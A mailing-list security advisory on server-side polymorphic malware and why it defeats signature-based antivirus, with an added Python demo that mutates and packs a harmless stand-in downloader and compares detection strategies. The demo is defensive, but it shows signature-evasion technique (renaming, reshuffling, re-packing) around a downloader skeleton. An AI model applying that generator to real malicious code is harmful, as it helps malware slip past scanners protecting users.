NOW READ THIS
("Security Advisory")
Submitted by: Bill Hickey
NCVA List Master
NRT-0350 Server-Side Polymorphism Challenges AntiVirus Industry:
A new trend in mutating malware has been identified in which malware is being recreated
by the server that disseminates it - a concept often called pseudo-polymorphism, according
to an online press report. Until the user connects to the malware generator located on a
web server, the particular malicious variant that will come to infect their computer does
not exist. The malware generator starts with a copy of a malware program and renames
internal variables, subroutines, and program logic locations. It then re-encodes or packs
the program using a different packing engine. Additionally, program instructions and
subroutines get moved around, encoded with arbitrary ASCII characters, and even the
malicious payload is recreated on the fly.
This server-side polymorphism is an extension of the trend toward much of today's malware
being distributed by infected web sites. Rogue code installed in the web site can exploit
vulnerabilities in site visitors' systems, or can use social engineering to trick the user
into downloading code. The first code that is downloaded to the unsuspecting user's machine
and executed is a small malicious program with only one purpose: silently install more
malicious programs. This "downloader" installs anywhere from a handful to dozens of other
malicious programs, each coming from a different infected or malicious web host on the net.
The programs and scripts used in these attacks often go undetected by traditional
signature-based anti-virus scanners. No signature matches because the particular program
never existed before. Every separate user connection to an infected web server results in
a different version of essentially the same malware program.
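The following Python example is added here to make the mechanism concrete; it is not code from the press report or from any malware author. A toy "server" rebuilds a harmless script for every request (renaming internal identifiers, shuffling its subroutines, and wrapping the result in one of several encoders with a matching decoder stub), and a toy "scanner" then tries three strategies against a batch of served variants: file hashes, a byte signature, and a signature over a normalized form of the unpacked script. The script payload, the packer names (`b64`, `hex`, `rev`) and the `_unpack_*` stub names are constructed for this demonstration; the generator itself never appears in its output, which is the server-side property the text describes.

```python
"""Toy server-side polymorphism and what it does to signature scanning."""
import ast
import base64
import hashlib
import random
import re
import string

# Constructed, harmless stand-in for the "downloader": it only names steps
# via undefined helper calls, it never performs any download or install.
BASE_PROGRAM = '''\
def fetch_stage2(url):
    data = download(url)
    return data

def install(data):
    write_file(data)
    run_file()

def main():
    payload = fetch_stage2("http://example.invalid/stage2")
    install(payload)
'''

KEYWORDS = {"def", "return"}                       # never renamed
EXTERNAL = {"download", "write_file", "run_file"}  # external helpers, kept
TOKEN_RE = re.compile(r'"[^"]*"|[A-Za-z_]\w*')     # string literal or identifier

# Assumed packers: (pack, unpack) pairs keyed by the name written in the stub.
PACKERS = {
    "b64": (lambda s: base64.b64encode(s.encode()).decode(),
            lambda s: base64.b64decode(s).decode()),
    "hex": (lambda s: s.encode().hex(), lambda s: bytes.fromhex(s).decode()),
    "rev": (lambda s: s[::-1], lambda s: s[::-1]),
}
STUB_RE = re.compile(r"# packer=(\w+)\n_b = (.*)\nrun\(_unpack_\w+\(_b\)\)\n")


def _rename(src, new_name):
    """Rewrite every internal identifier using new_name(old, index)."""
    mapping = {}

    def sub(m):
        tok = m.group(0)
        if tok.startswith('"') or tok in KEYWORDS or tok in EXTERNAL:
            return tok
        if tok not in mapping:
            mapping[tok] = new_name(tok, len(mapping))
        return mapping[tok]
    return TOKEN_RE.sub(sub, src)


def _blocks(src):
    """Split a script into its top-level function definitions."""
    return [b.strip() for b in re.split(r"\n(?=def )", src.strip()) if b.strip()]


def generate_variant(seed):
    """Server side, once per request: rename, reorder subroutines, pack.
    Only the packed output ships; this generator stays on the server."""
    rng = random.Random(seed)

    def fresh(_old, _i):
        return "".join(rng.choices(string.ascii_lowercase, k=8))
    blocks = _blocks(_rename(BASE_PROGRAM, fresh))
    rng.shuffle(blocks)
    body = "\n\n".join(blocks) + "\n"
    name = rng.choice(sorted(PACKERS))
    pack, _ = PACKERS[name]
    # Decoder stub plus blob; the stub text differs with the packer chosen.
    return f"# packer={name}\n_b = {pack(body)!r}\nrun(_unpack_{name}(_b))\n"


def unpack(variant):
    """Scanner side: recognise a known packer stub and recover the script."""
    m = STUB_RE.fullmatch(variant)
    if m is None:
        raise ValueError("unknown packer stub")
    _, unpack_fn = PACKERS[m.group(1)]
    return unpack_fn(ast.literal_eval(m.group(2)))


def fingerprint(src):
    """Name- and order-independent signature: rename identifiers per block by
    first appearance, sort the blocks, hash the result."""
    canon = sorted(_rename(b, lambda _o, i: f"ID{i}") for b in _blocks(src))
    return hashlib.sha256("\n".join(canon).encode()).hexdigest()


def scan(variants):
    """Compare three detection strategies across a batch of served variants."""
    sig = b"def fetch_stage2("   # byte signature taken from the base sample
    base_fp = fingerprint(BASE_PROGRAM)
    return {
        "distinct_hashes": len({hashlib.sha256(v.encode()).digest() for v in variants}),
        "byte_sig_hits": sum(sig in v.encode() for v in variants),
        "normalized_hits": sum(fingerprint(unpack(v)) == base_fp for v in variants),
    }


if __name__ == "__main__":
    print(scan([generate_variant(i) for i in range(20)]))
```

Twenty requests yield twenty distinct hashes and zero byte-signature hits, while the normalized fingerprint matches all twenty, but only because the scanner already knows every packer stub; a new or nested packer, which the text notes is common, defeats the `unpack` step before normalization ever runs.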
Conventional mutating viruses carry their mutation engine with them and can be recognized
by that engine's code, some of which cannot be hidden if the next generation is to mutate
correctly.
Anti-virus vendors figured out that they could forget trying to recognize the actual
malware, which could take a billion different forms. Instead they just look for the code
of the static mutation engine. Authors of polymorphic malware have tried to complicate
the process by morphing the mutation engine signature, with varying degrees of success.
However, with server-side polymorphism, the mutation engine is left on the originating
server. The malware does not have a static mutation engine component to identify in the
first place. Add to this the fact that the mutated code is packed, and often re-packed
again many times, and anti-virus scanners have their work cut out for them.
(www.infoworld.com 26OCT07)